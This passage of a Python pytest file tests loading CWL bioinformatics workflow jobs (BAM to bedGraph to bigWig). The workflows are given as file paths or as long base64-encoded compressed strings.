1wP1KDcf9Tffn8195O+9S4JbzpOtzb6zs/t4C0uCXfZvWLFUlNhHn1z7vqOKKR5hfACW61\
5VLwozyJsRAaagcGNj/agKuUuVyTvUvcredt1PqF8z6TV6giXnoHDFP7YgrMJX/W4/Aken\
7E+WkeRuZON9nX/fey155W7P+ocV//8O/iFCSaTE6zF5BW/d/ZSnpTs1eDuGUiilKzFtDR\
Bf4gUaC/cXmDHAV7/8+NstGByiHwBRiBpcb+88XryPuvaa1erW0JKT+BKzIyYbX7k/ZS+V\
QoRPHiP8BicR/qVgcP/Olz7WN4yWr7fcSMcQs/qqq36BkkD6dIaehK4sZaBe39UAWOv/Qz\
AlAl8IRVc/sZxj1N0eCOjLX8Y8uVShTO/W66nQPIELCR8mHoTJiHrp7QhCAGf4OYDfK9N0\
qlvb5USfmrFEHWTjLApCTEylDNwqjik6fs3DolIOluKRoZ3qVPfoiV1Nd+0eAgHHzNcSom\
ldeB5rilGQiYPujFvUb/s7u/cLRNa28TakNKpJDdrvX22y0JwGq/oVcVg127GY76jeayiy\
MOV75BMYnnbZjU7IljLMpcuWyK4aDd0hmKkZT26EKnorVOl6LBrTpfQ3xWR3u0NaZjI6fH\
V+Lun9/MEcXpJyqPKcVtjQT0qH3oXU6fO/LFbEY9+xJ3sqjTn/s8LGRmwPEeRDBPkQQT40\
lK5qKNVFR1U4i2i5C8vk3jsyW/qtEHeNx6yTkANb2edX8Z2LVj/bPsVZucPwZxMQlFpbF3\
sCM+oJRFNTtyVglvIeRe3QulRKQtvtjm/oNh/1QxSjsPkKuFE45bod0JRaqRMsL6qucdCp\
TbWElECnhYeNkHvv372+k0+NwDTV1ENXeCVg/vlnLTPgYa4EJ7q6D9oN2h7esmfBeB9nYj\
1MV/mwJNetEGgq5x4Dolgorjgu1KjrbGqNYKWAVi7pIwr8uor/FbGiD24JOHhHCVWH595t\
XhXUgSyb8NSfHdkCLfmiFpnu9yjRWCwPtbC+Gm9hrF1USblvGcTnEfhMwwikcShSLOpZPc\
0Z5vbHIrXoivJpJUar1U67+cKySHzWxVJfuzqkM6Z8i9Vb5wqzDMymLwr922e1J8C4cr9q\
4c2fYqfE/b147HktRzJVMN8RwQBAOFYAivWcA0myQV6UwrRa4qYeQq/+IpKmMLfh4ZIyZu\
37csqJnbKPrVM+f8ktJm+e+4LOn+x4NuB6cDsf3M4Ht/PB7Wx2O/MNlrueovJVe7r7zbiM\
yMuKiVTUF1T9cr7SJZTGb+ljbZMGpxejWkp/RF8jp3vo6EYRZpjNVaS6d6oNcpJRq6hxiw\
v7BeIWPl31wJYiFDb18rFRnpwa6X5uclw1nmFkEIEzGvAlxKEd9q6lCLCVSglMWI4z9EYZ\
nLR4DGtvF6wldaTbW0GEVrcP24PVJlbK17FmHrhxYgquK6xTyATOAoblDfI8Rs03n9CBCb\
EbHK8U2JtGla/vyK9RFTe3gBDA2nQzqk2rXFh8R18IgXWCI4YOP7X8a4YtufnlMtiGuSSA\
uxVRGB433rw1d9Rq1n2kmyWrmTt9IQlJa4xz9JcZjRbanZbC0hf0F7/sTmu3vp6G656APC\
MfUTcj1dFSVOLV4nIW461hhCyraQgzAQL9HchoI9V9mCMds1hF zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG"
)
]
)
def test_load_job_from_file(job, workflow):
    """load_job should succeed for a valid job/workflow pair.

    "workflow" is either a list of path components relative to
    DATA_FOLDER or a str with compressed workflow content.
    """
    pickle_folder = tempfile.mkdtemp()
    # dropped redundant parentheses around isinstance check
    workflow_path = (
        workflow if isinstance(workflow, str)
        else os.path.join(DATA_FOLDER, *workflow)
    )
    job_path = os.path.join(DATA_FOLDER, "jobs", job)
    try:
        job_data = load_job(
            workflow=workflow_path,
            job=job_path,
            cwl_args={"pickle_folder": pickle_folder}
        )
    except BaseException as err:
        # was an f-string without placeholders and "err" was unused;
        # report the error like the sibling tests do
        assert False, f"Failed to load job from file. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"job, workflow",
[
(
"bam-bedgraph-bigwig.json",
["workflows", "dummy.cwl"]
),
(
"bam-bedgraph-bigwig.json",
"nonenonenonenonenone"
),
(
"bam-bedgraph-bigwig.json",
# bam-bedgraph-bigwig.cwl
"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\
m3vwGItZCP"
)
]
)
def test_load_job_from_file_should_fail(job, workflow):
    # Broken or nonexistent workflows must make test_load_job_from_file
    # fail with AssertionError (reuses that test as the checked action)
    with pytest.raises(AssertionError):
        test_load_job_from_file(job, workflow)
@pytest.mark.parametrize(
"job, workflow, cwd",
[
(
{
"bam_file": {
"class": "File",
"location": "../inputs/chr4_100_mapped_reads.bam"
},
"chrom_length_file": {
"class": "File",
"location": "../inputs/chr_name_length.txt"
},
"scale": 1
},
["workflows", "bam-bedgraph-bigwig.cwl"],
os.path.join(DATA_FOLDER, "jobs")
),
(
{
"bam_file": {
"class": "File",
"location": "../inputs/chr4_100_mapped_reads.bam"
},
"chrom_length_file": {
"class": "File",
"location": "../inputs/chr_name_length.txt"
},
"scale": 1
},
# bam-bedgraph-bigwig-single.cwl
"eNrtPA1X20iSf6Wf39zDnrFkMIFJnEAWCMlwm0AukMu9i/OwLLXtXmS1Ri1BSDb//aqqu/\
Vl2YZM5mb3PdidgKXuquqq6q7P9teWfxP+N0+UkFFrwFrXW+5mq8tafugphQ8+yORqEsob\
fJjw3zOR8DmPUnz38Wsx7Dzl8UkUZ+nx5zjhCsG9K0a3vnVZafBJFIqI/6d37Sk/EXFaGf\
kJEAmEhEO/tsbe/HIiQk4f0tsY/2i9xAcwLpC+hgfD2eHBG4Yju0zJJOUBG98yX8okEJGX\
coU0tPxZIueXIY+m6Wwt2AtvzAIeirlAaDRVKjnnTM8nZAP2jF6cenO+/+zi4HBffz4XX/\
g+oVS+V0MD7PTS5yVER5JPJsIXsH6WSkYzWDrjbMojxOfLa554U44r8uBTpFIPhk48P5UJ\
IZl7ccyDy4R7gbqMsvmYJxWUIqogfOslQG/KE0QH2PwsBBYZxJ5iW5v002sA67KTaSQTzd\
4xD1IpQ+VoQoFOF9SJiWgYodxSeQkjpokXz5gCBWFiYnAIxeJEXouAB8OIVhB7IvFnIq6Q\
PQbg3IvKpB9H3hgA4HAeODwKFphk14MajZAn8BRV61KBTFZx5ZwDT8VnWJqdwnAKm8hkLR\
KVJl4UVKDDIxFNK3LOOV0HJyfANJDHtRcqwC7nIGcVc1+AWjADG9GMxfRGTElzI5DgGnxn\
WYobw462CwGUtD3E9IOYarBGSj8IMA9eITTNmDgU6TqhLmcMQuaePwOBJymyCbcFwTQ7fO\
N0gwF32MaLDYZ6SkgDoG8tzpkXAQLNXOZpyHOkAcHgIcLGEnY5KT8QhMtEwRABuGgrFkQo\
iSHmxCpk1Hi66LHnMkt8zV46rfKdQruGQPTKkBaYr8VHMliU4Z0R52h7hgyLLPTGPCTWGW\
kyWQi9gRo7StOjtwSPizO8dBbQsySL6Pca83Mk53Pg8muwFxcgwzVWaJVhgZk8t02vxRin\
tq69BI74iZeF6aVeX74F2B6bZJGPO7zdYV8ZDuWfU3jc1ubJDXgM+rG3x4YtZzwdttg//8\
kaX3nDVuf5sOVaJg1bA/iUeuNh6ynoV5olkZ1Iv4gGN5Q+nS8uqXt7o7fRcVUofN52tjof\
Nz/Z527+fLMLb9x/SBHRU/YLEvyUfXva+kRmdSYWWfZC+lc8qTEqoIdvs1BrgJA3XhIkcs\
z7PXvk9wfXfbe/C+KqW+xiCY1aSK8PRQRmeUoDYqlEquW/tQsD4AzM+EvYajjrp6/DiBHv\
QXRwOCP72z335+HQBa36qSc6Ltj2tL3IvthLZ53O8w1HwMCNAfzeeIqwDL8/anhd1jzzE4\
z9ZkyTdQdg49Mo0nGwABFoPTzRjodM4Oxg7VOZgk+AT+aZwm1RckbsQjsMDrVnwMjedDLp\
XfuTfXcYvdXLA8OoeMh9nCIjOmzGnjIGIscNYuUR6rGhcL1b83wt639FI0xE4BxnWl66dr\
DM2Uw8YqecB0RjeMtuZjxijmCT0Ju67KJwXIhYWFJa8aRWeEyW47h9ymv42IpQGbulVXHw\
R3BRxlyZOXju3M7HoKA0CzYfPsI9SL8D/e8XsyFWMWSntP53PAYpkjT0zkYiXHZ4aw+Pbu\
4KsdwVYjciDNFwAA7wqthMqFTCAThHYVoDN4zQwqU1llnfCI8aMizugoQ7hlWr3MtVy9ut\
iluDKS35PHdCV3qfoLnHaJ7zQbR7UeZzYIuAE0rrfgqrN1OAVbBmAMeBLNiOMW0QAPRe8U\
kWksmPcDuF4guOKOHvMu5O3a6xyTH4r3PgMSyItd+9fdMBGA57oSWCJIAxecqEy2FGFtEK\
AxrSfvn67ODCcvCuvvMqbv7axM3mswx8YHta0bAOPc3PJdRzOqe+MR7Cxi8NbyAUDFNltn\
Xcl88ow16GeeHoO4txnV6IXtj3Bg64kvK6UUCRTOtxwGp/cZUMHtdkQIBKi0iBmhQMMr0A\
a42HNKja4fGLrT4Dw5cIrnANAexTAYYf3xReOSgOHXN6P5f1Et68RDgm/FRdreyZAnC4f4\
5OXh28A7yngBNdzWHrBfwlY/SWgXI1jICXIppwfQ6Mwe5fKdoFy3ERzY3YDnH6kcwiOJPo\
7/MUPGcYhqjpwXEUAM6J4CHsobbeHr4Ms3mE8utubXW3+riV7hDXrBLHk5o4iiBmwem/Tx\
gEhH0QcAKjcAwDjEMIwkshNPfA7O7mC2ob/14o84jt6mOifX7x7uT0VWdgDfkvqAzOXaPR\
laZ0s7r02C8vG0FT3Irwwdj/DtYcdEGg72V3XfZ9eLeqeAHMt7vGO8CoSrzTFOp0UMvsCW\
3gWOmgWGRi9DbfCuQeDO8ahq9cW7+6tomqGKvmyD0/4D/fH992FR/CKDNTzscQaTAPLLyd\
pcDgA/884yLs7wF3P6M+y2EEagxI4NCDWegyImdzf8BlJ0kCTt+1hxqADHQC2q5OHjCgwp\
6cXhy/On6Xm62d71OSR9WF7azfkjtwXBWLBGsEkR1oDLwBRsPGy/dsTtr295G2UyVtez1p\
2/clrRbkrclznC4mN0pRMIKsB//ai7u0NC464yoNYHwJx6sc9EJSaBGVmZ07E6wWPtZj2O\
fLXgyWhb3tjol8MKUAkYcJwMmbtj4uvsvd3BY60j/hVBV7PtdsoNBylqbxoNdT/ozPPVcm\
0x6J4Cf9QDvoOEZVB13rdEAPha1S+yYJJoRJDazDv5h8JO9/EMibCFzg4H0SWioQQ+LduF\
PYoNkYTrEE3FgIoVIXTGzv0EvUlXBCb9y7MdluBR4MqFLSIwy95jynRufLgGN8AEook9sy\
Ro1tKQo9HQP3SPESv25ublwPWDnjxA4zQPVenxwdn54fO32dIlEDod6CaT+b6DyKDejV4A\
gdHXHN8UBuVViGwgRn2eb02WswCRmomh6VFQwDMnwaexMWgoO1ImSZ1FIIanCWTL1IfNHp\
UL0sPvXCU4sW3CkRRfCaHc1EGCQ82lDsN6likYJT+YYHAjxCdsRxs5r5JvmxgOqthPAjPA\
gCzOTosZ7+QE6PlsD784PKq9cADZy+2yoxlSHv+NTkoM5+0y9iwnQE4sWnj3b6/Sf6BZwT\
nKeWBHi3DT/sELYhmKGDa8PNFE70eCYjmv3LVntna7uzu73rPOpvmpwJrnIqyxqDovdz+n\
zDK0UicHpz4JPXK97/R38zH9KbhnLshfBIzbyEB738jYNInIjfuHE0NTuEYzaVkj33lORB\
GPJkekvW6WQ+zyIJ0G//KFS9O9g7rrgHbheo5ViPmnMTjdV0AE4IC8iq9htgl8dD9neZhs\
IzWgQHhyCdxt+pHMwFcMe90kP+NsWnuD2NWAHSgUmPiaC0E2Tii4BkgLGNA//1nd1Hj3ed\
7cdPHoMo7f9KqSI4LIrwSC1mtdG70vmcsTfvlVJB4GKhvz9aTCeMhtEwesFjTrYTk0OjIm\
c1KlJCDBRa2HAtTyrBmRcMMAQb/YyJsxE+YCPKjY26Oho0T0YuIhpRjDYiQY8aormRMSxg\
fxRF21HhLRZB4khHwiPwcACzAVmL+yD4mHH/CmgDrM2Y9ASMT4meIu608DFsG62IPTUB5N\
4asmGPDCOE2G3ktc7dIEcEDDamksJc5D1F9ZpNS6zoKM8dGwNdAJG12omJTlBAOpE2WoBV\
45iLerAATGsAoYTxI0wvm2Xb1LyaySzE8kzJnWlr5mPmThmFMtnrUadbUioBIWMWBzQHwt\
VRnssGHJYYdBdoSaZMUyZOqLIPVU1sVvTYAnGHZoN7Y+PxvFewdQZNibaPZ28vTs5Ozz9h\
ErKSWGXOlD3TA/dRXjqRoQboO5HyD9NhWkvsAqmVpK6rHS3GitzuJSZ3L5uzu4gGgAcIeS\
FvCBEqVbPMgWDnsDaFDmAsHFx/UK5bd3L8OZ/5zLsW4JViZlWaDFo5wehaGr58BxFfeCJX\
UaHB6dAO1DJycELhhH8/teNpiVpNKcohLyxpYTDMfwQ8haMbQn/F+cAi1MtxM1/5Lg+y3l\
SGAY/eeumsN+Nh3LPlJ3eWzsMcp3cHpF08X0APrzlrw5SCF7/JGw5Hug78KA8jScEwJzEt\
QkLkkJ2S2wA4gSB8VLLIgLILhAAhJTiHqAsszWf9ngn/CvgNGzLx/JTiTosCdpBnZUnoNh\
dwYeY2jsNbOLwGbNiaAkrm3LDNnyB8ApkUm9XKQufIcG/80aSZpmR56ky//4MJNA3kXmm0\
Et4/nkzTwNan1DRvKXOCzP3uDJjG9wPyYBrQimwYURz7y6nN01k281IIfXlCCGBOFMIE/v\
uo52Rq86pHtf2iFNRTpkoXQe6EJMiI8D8183UnQnaWM/Du2RWrQNvLgW3fG9jc+0zg7pnQ\
0mu+R1rLbJHG5FauhUWKS+8UdO6QursXozSoH1aS0uB+RGHKrnFteSpnhi1SESvw2L/C5o\
YhBp6wxdn7o/Oj3is69p3DBEwGHnw4iuEwdDdFpO26EcxEJHAk0MuKg1bCec5BfjzROa85\
csRYWkZeWDP83ADrHxM03dMaWwpOzy6OB+wDmguMY4DLHsvXXkLaLXuYubk2hxecfUJvvO\
InizEnpL1XnKo5xyzn0MAzH7w63PyIr1udfvj+gh0dnCJ9iAEUD2SPnh9uB5h6WHTjgB/V\
Q6s+h9MM6K+yPt93hAS8BTgGPyQCg8RS3NYsxzyuUosiLQnx+LM3j0NeEkuBjG2gb703bL\
25ZRf4EM6La6HEWGB6ZK+PxkEme/2dne72Jvx/owCC3i8hzbTXrne+83smkXiILG9lxsDV\
w/YszAMijfAoKZFd1u6L4//Ryo1wtUPe3uosNA+YmKXaQEDHb5pkPkRW+BGPXfKaCMzK9g\
IcgEafayZ12W/ZHJSmPZtuPenQdBi9NUz7j570dzZ3+1vmUR8fbW89ebL96zY+cl3XDn58\
OQ0xJ7D56yUaBgkxxaP+bl/javf1mnR8gca67YiOXpvtEJkmMotNv2reZErgD4DLSCY6YO\
igOlcMXAn2DODss33929UhCAiSYlaVYSspN2rW3q6gB8PUprCnRsFiFGPQA15vrsMtIuAZ\
gNgHVEYsZWQXItb8P4t0cwzqCeoLHlS17bah2Jvb8/96zSCg9CgMhE1kfFvDVttriy6Acm\
syc8E4x4JTIIfj57fq95A5DmZ294z6OM5MqtR8cmiE66viRGLOAXOAs0MEAOukrhuNuWv6\
PtETQMXQ3Rcn0UTC0vf1Iw3XVBVEtNj5VHQuVxpaTBqAChzjaa3krYrePHq2vIMAyJ1gfx\
mmMGodBLAx+PIqP06sV/kXiyINHaHVqmjxd0Npr/ag1KXSyjsjmrsuGh+Xy9D2L1sl1a2e\
ZhFUUWiswHwiPpf7Hf/FmhCnfG0DYqkTpDYS366sAz0FXagOAIej6Pdc22r4g3sIlS8CLx\
5cb7qbbn+hf7BC2r1bCB9RneyK35ZnFiC8JPEoXw2GZK6Kql8z2KIWeaXrbyvLl6VqpXPV\
hQMIqNh7e3a+9bEL//Y/DdFZpdwHvMAgDd+B54hhWWo+91lbJmIKtnPr/6tkuYzbptZYrz\
u2G1S13ek01QsR8l9WHoRNmH12iIQ/qyxYoHgoBz6UAx/Kgf9C5cCDCFZ7y/4OJHjgrF43\
1wP1KDcf9Tffn8195O+9S4JbzpOtzb6zs/t4C0uCXfZvWLFUlNhHn1z7vqOKKR5hfACW61\
5VLwozyJsRAaagcGNj/agKuUuVyTvUvcredt1PqF8z6TV6giXnoHDFP7YgrMJX/W4/Aken\
7E+WkeRuZON9nX/fey155W7P+ocV//8O/iFCSaTE6zF5BW/d/ZSnpTs1eDuGUiilKzFtDR\
Bf4gUaC/cXmDHAV7/8+NstGByiHwBRiBpcb+88XryPuvaa1erW0JKT+BKzIyYbX7k/ZS+V\
QoRPHiP8BicR/qVgcP/Olz7WN4yWr7fcSMcQs/qqq36BkkD6dIaehK4sZaBe39UAWOv/Qz\
AlAl8IRVc/sZxj1N0eCOjLX8Y8uVShTO/W66nQPIELCR8mHoTJiHrp7QhCAGf4OYDfK9N0\
qlvb5USfmrFEHWTjLApCTEylDNwqjik6fs3DolIOluKRoZ3qVPfoiV1Nd+0eAgHHzNcSom\
ldeB5rilGQiYPujFvUb/s7u/cLRNa28TakNKpJDdrvX22y0JwGq/oVcVg127GY76jeayiy\
MOV75BMYnnbZjU7IljLMpcuWyK4aDd0hmKkZT26EKnorVOl6LBrTpfQ3xWR3u0NaZjI6fH\
V+Lun9/MEcXpJyqPKcVtjQT0qH3oXU6fO/LFbEY9+xJ3sqjTn/s8LGRmwPEeRDBPkQQT40\
lK5qKNVFR1U4i2i5C8vk3jsyW/qtEHeNx6yTkANb2edX8Z2LVj/bPsVZucPwZxMQlFpbF3\
sCM+oJRFNTtyVglvIeRe3QulRKQtvtjm/oNh/1QxSjsPkKuFE45bod0JRaqRMsL6qucdCp\
TbWElECnhYeNkHvv372+k0+NwDTV1ENXeCVg/vlnLTPgYa4EJ7q6D9oN2h7esmfBeB9nYj\
1MV/mwJNetEGgq5x4Dolgorjgu1KjrbGqNYKWAVi7pIwr8uor/FbGiD24JOHhHCVWH595t\
XhXUgSyb8NSfHdkCLfmiFpnu9yjRWCwPtbC+Gm9hrF1USblvGcTnEfhMwwikcShSLOpZPc\
0Z5vbHIrXoivJpJUar1U67+cKySHzWxVJfuzqkM6Z8i9Vb5wqzDMymLwr922e1J8C4cr9q\
4c2fYqfE/b147HktRzJVMN8RwQBAOFYAivWcA0myQV6UwrRa4qYeQq/+IpKmMLfh4ZIyZu\
37csqJnbKPrVM+f8ktJm+e+4LOn+x4NuB6cDsf3M4Ht/PB7Wx2O/MNlrueovJVe7r7zbiM\
yMuKiVTUF1T9cr7SJZTGb+ljbZMGpxejWkp/RF8jp3vo6EYRZpjNVaS6d6oNcpJRq6hxiw\
v7BeIWPl31wJYiFDb18rFRnpwa6X5uclw1nmFkEIEzGvAlxKEd9q6lCLCVSglMWI4z9EYZ\
nLR4DGtvF6wldaTbW0GEVrcP24PVJlbK17FmHrhxYgquK6xTyATOAoblDfI8Rs03n9CBCb\
EbHK8U2JtGla/vyK9RFTe3gBDA2nQzqk2rXFh8R18IgXWCI4YOP7X8a4YtufnlMtiGuSSA\
uxVRGB433rw1d9Rq1n2kmyWrmTt9IQlJa4xz9JcZjRbanZbC0hf0F7/sTmu3vp6G656APC\
MfUTcj1dFSVOLV4nIW461hhCyraQgzAQL9HchoI9V9mCMds1hF zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG",
os.path.join(DATA_FOLDER, "jobs")
),
(
{
"bam_file": {
"class": "File",
"location": get_absolute_path(
"../inputs/chr4_100_mapped_reads.bam",
os.path.join(DATA_FOLDER, "jobs")
)
},
"chrom_length_file": {
"class": "File",
"location": get_absolute_path(
"../inputs/chr_name_length.txt",
os.path.join(DATA_FOLDER, "jobs")
)
},
"scale": 1
},
["workflows", "bam-bedgraph-bigwig.cwl"],
os.path.join(DATA_FOLDER, "jobs")
),
(
{
"bam_file": {
"class": "File",
"location": get_absolute_path(
"../inputs/chr4_100_mapped_reads.bam",
os.path.join(DATA_FOLDER, "jobs")
)
},
"chrom_length_file": {
"class": "File",
"location": get_absolute_path(
"../inputs/chr_name_length.txt",
os.path.join(DATA_FOLDER, "jobs")
)
},
"scale": 1
},
["workflows", "bam-bedgraph-bigwig.cwl"],
None
)
]
)
def test_load_job_from_object(job, workflow, cwd):
    """Loading a job from an already-parsed object should succeed.

    ``workflow`` is either a ready-to-use location (str) or a list of path
    components to be joined relative to DATA_FOLDER. A temporary pickle
    folder is always created and removed, even on failure.
    """
    pickle_folder = tempfile.mkdtemp()
    if isinstance(workflow, str):
        workflow_path = workflow
    else:
        workflow_path = os.path.join(DATA_FOLDER, *workflow)
    try:
        load_job(  # result intentionally unused; only success/failure matters
            workflow=workflow_path,
            job=job,
            cwl_args={"pickle_folder": pickle_folder},
            cwd=cwd
        )
    except BaseException as err:
        # Include the underlying error so the failure reason is visible,
        # matching the message style of the other tests in this file.
        assert False, f"Failed to load job from parsed object. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"job, workflow, cwd",
[
(
{
"bam_file": {
"class": "File",
"location": "./inputs/chr4_100_mapped_reads.bam"
},
"chrom_length_file": {
"class": "File",
"location": "./inputs/chr_name_length.txt"
},
"scale": 1
},
["workflows", "bam-bedgraph-bigwig.cwl"],
None
),
(
{
"bam_file": {
"class": "File",
"location": "./inputs/chr4_100_mapped_reads.bam"
},
"chrom_length_file": {
"class": "File",
"location": "./inputs/chr_name_length.txt"
},
"scale": 1
},
# bam-bedgraph-bigwig-single.cwl
"eNrtPA1X20iSf6Wf39zDnrFkMIFJnEAWCMlwm0AukMu9i/OwLLXtXmS1Ri1BSDb//aqqu/\
Vl2YZM5mb3PdidgKXuquqq6q7P9teWfxP+N0+UkFFrwFrXW+5mq8tafugphQ8+yORqEsob\
fJjw3zOR8DmPUnz38Wsx7Dzl8UkUZ+nx5zjhCsG9K0a3vnVZafBJFIqI/6d37Sk/EXFaGf\
kJEAmEhEO/tsbe/HIiQk4f0tsY/2i9xAcwLpC+hgfD2eHBG4Yju0zJJOUBG98yX8okEJGX\
coU0tPxZIueXIY+m6Wwt2AtvzAIeirlAaDRVKjnnTM8nZAP2jF6cenO+/+zi4HBffz4XX/\
g+oVS+V0MD7PTS5yVER5JPJsIXsH6WSkYzWDrjbMojxOfLa554U44r8uBTpFIPhk48P5UJ\
IZl7ccyDy4R7gbqMsvmYJxWUIqogfOslQG/KE0QH2PwsBBYZxJ5iW5v002sA67KTaSQTzd\
4xD1IpQ+VoQoFOF9SJiWgYodxSeQkjpokXz5gCBWFiYnAIxeJEXouAB8OIVhB7IvFnIq6Q\
PQbg3IvKpB9H3hgA4HAeODwKFphk14MajZAn8BRV61KBTFZx5ZwDT8VnWJqdwnAKm8hkLR\
KVJl4UVKDDIxFNK3LOOV0HJyfANJDHtRcqwC7nIGcVc1+AWjADG9GMxfRGTElzI5DgGnxn\
WYobw462CwGUtD3E9IOYarBGSj8IMA9eITTNmDgU6TqhLmcMQuaePwOBJymyCbcFwTQ7fO\
N0gwF32MaLDYZ6SkgDoG8tzpkXAQLNXOZpyHOkAcHgIcLGEnY5KT8QhMtEwRABuGgrFkQo\
iSHmxCpk1Hi66LHnMkt8zV46rfKdQruGQPTKkBaYr8VHMliU4Z0R52h7hgyLLPTGPCTWGW\
kyWQi9gRo7StOjtwSPizO8dBbQsySL6Pca83Mk53Pg8muwFxcgwzVWaJVhgZk8t02vxRin\
tq69BI74iZeF6aVeX74F2B6bZJGPO7zdYV8ZDuWfU3jc1ubJDXgM+rG3x4YtZzwdttg//8\
kaX3nDVuf5sOVaJg1bA/iUeuNh6ynoV5olkZ1Iv4gGN5Q+nS8uqXt7o7fRcVUofN52tjof\
Nz/Z527+fLMLb9x/SBHRU/YLEvyUfXva+kRmdSYWWfZC+lc8qTEqoIdvs1BrgJA3XhIkcs\
z7PXvk9wfXfbe/C+KqW+xiCY1aSK8PRQRmeUoDYqlEquW/tQsD4AzM+EvYajjrp6/DiBHv\
QXRwOCP72z335+HQBa36qSc6Ltj2tL3IvthLZ53O8w1HwMCNAfzeeIqwDL8/anhd1jzzE4\
z9ZkyTdQdg49Mo0nGwABFoPTzRjodM4Oxg7VOZgk+AT+aZwm1RckbsQjsMDrVnwMjedDLp\
XfuTfXcYvdXLA8OoeMh9nCIjOmzGnjIGIscNYuUR6rGhcL1b83wt639FI0xE4BxnWl66dr\
DM2Uw8YqecB0RjeMtuZjxijmCT0Ju67KJwXIhYWFJa8aRWeEyW47h9ymv42IpQGbulVXHw\
R3BRxlyZOXju3M7HoKA0CzYfPsI9SL8D/e8XsyFWMWSntP53PAYpkjT0zkYiXHZ4aw+Pbu\
4KsdwVYjciDNFwAA7wqthMqFTCAThHYVoDN4zQwqU1llnfCI8aMizugoQ7hlWr3MtVy9ut\
iluDKS35PHdCV3qfoLnHaJ7zQbR7UeZzYIuAE0rrfgqrN1OAVbBmAMeBLNiOMW0QAPRe8U\
kWksmPcDuF4guOKOHvMu5O3a6xyTH4r3PgMSyItd+9fdMBGA57oSWCJIAxecqEy2FGFtEK\
